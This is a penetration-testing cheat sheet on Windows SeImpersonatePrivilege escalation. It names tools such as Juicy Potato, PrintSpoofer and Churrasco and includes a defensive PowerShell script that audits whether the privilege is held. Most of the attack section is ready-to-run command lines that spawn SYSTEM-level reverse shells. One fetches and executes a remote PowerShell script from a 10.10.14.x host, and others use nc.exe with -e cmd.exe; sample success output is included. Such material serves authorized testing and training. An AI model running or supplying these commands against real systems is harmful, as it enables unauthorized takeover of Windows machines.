SeTokenImpersonate

How to test: run whoami /priv and check whether SeImpersonatePrivilege is listed as enabled. If it is, the tool to use depends on the OS version and architecture:
- very old machines (before 2008, e.g. Windows 2003): Chimichurri, Churrasco
- latest and recent 64-bit systems: PrintSpoofer (precompiled)
- everything in between: Rotten Potato, Juicy Potato, etc. (available for both 32-bit and 64-bit)
PrintSpoofer only works on x64; for x86 use Juicy Potato.

Reference links:
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#seimpersonateprivilege-3-1-1
Precompiled PrintSpoofer exe (x64): https://github.com/dievus/printspoofer
Precompiled Juicy Potato (x86): https://github.com/ivanitlearning/Juicy-Potato-x86/releases
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#eop---impersonation-privileges
https://www.puckiestyle.nl/token-impersonation/
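The whoami /priv check above, scripted so it can be run as an audit of whether an account (for example a service account) holds SeImpersonatePrivilege at all. This is an added example, not code from the original note or from any of the tools linked; it assumes whoami.exe is present and an English locale (the State column reads Enabled/Disabled).

```powershell
# Added example: parse "whoami /priv" and report whether the current token
# holds SeImpersonatePrivilege and whether it is enabled.
# Assumes whoami.exe (Windows Vista and later) and an English-language OS,
# since the State column values ("Enabled"/"Disabled") are localized.
function Test-SeImpersonatePrivilege {
    $lines = whoami /priv 2>$null
    if (-not $lines) { throw 'whoami /priv returned no output' }

    # Output rows look like:  SeImpersonatePrivilege  Impersonate a client after authentication  Enabled
    # The privilege name is never localized, so match on it at line start.
    $row = $lines | Where-Object { $_ -match '^SeImpersonatePrivilege\s' }
    if (-not $row) {
        return [pscustomobject]@{ Present = $false; Enabled = $false; Line = $null }
    }

    # Columns are separated by two or more spaces; the last column is the state.
    $state = (($row -split '\s{2,}')[-1]).Trim()
    [pscustomobject]@{
        Present = $true
        Enabled = ($state -eq 'Enabled')
        Line    = $row
    }
}

$result = Test-SeImpersonatePrivilege
if ($result.Present) {
    $stateText = if ($result.Enabled) { 'Enabled' } else { 'Disabled' }
    Write-Output ("SeImpersonatePrivilege is held by this token (state: {0})" -f $stateText)
} else {
    Write-Output 'SeImpersonatePrivilege is not held by this token'
}
```

A service account that reports the privilege as present is a candidate for running under a more restricted identity, since the privilege is what every tool on this page relies on.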

How to Use Juicy Potato?

Spawning a PowerShell reverse shell:

JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.18/psrvsh.ps1')" -t * -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}

-a takes the command-line arguments you want to pass to the program given with -p. For the -c flag you need a CLSID from https://github.com/ohpe/juicy-potato/tree/master/CLSID (pick the list for your target OS version and try the CLSIDs one by one until one works). More examples:

JuicyPotato.exe -l 9999 -p c:\inetpub\wwwroot\upload\nc.exe -a "IP PORT -e cmd.exe" -t t -c {B91D5831-B1BD-4608-8198-D72E155020F7}

JuicyPotato.exe -l 1340 -p C:\users\User\rev.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}

JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a "/c c:\users\User\reverse_shell.exe"

Output of a successful run:

Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK

How to Use Churrasco?

https://github.com/Re4son/Churrasco/blob/master/ReadMe.txt

churrasco.exe -d "C:\Inetpub\wwwroot\nc.exe -e cmd.exe 10.10.14.15 5353"

-d specifies the command to run; the command above is a simple one-liner nc reverse shell.
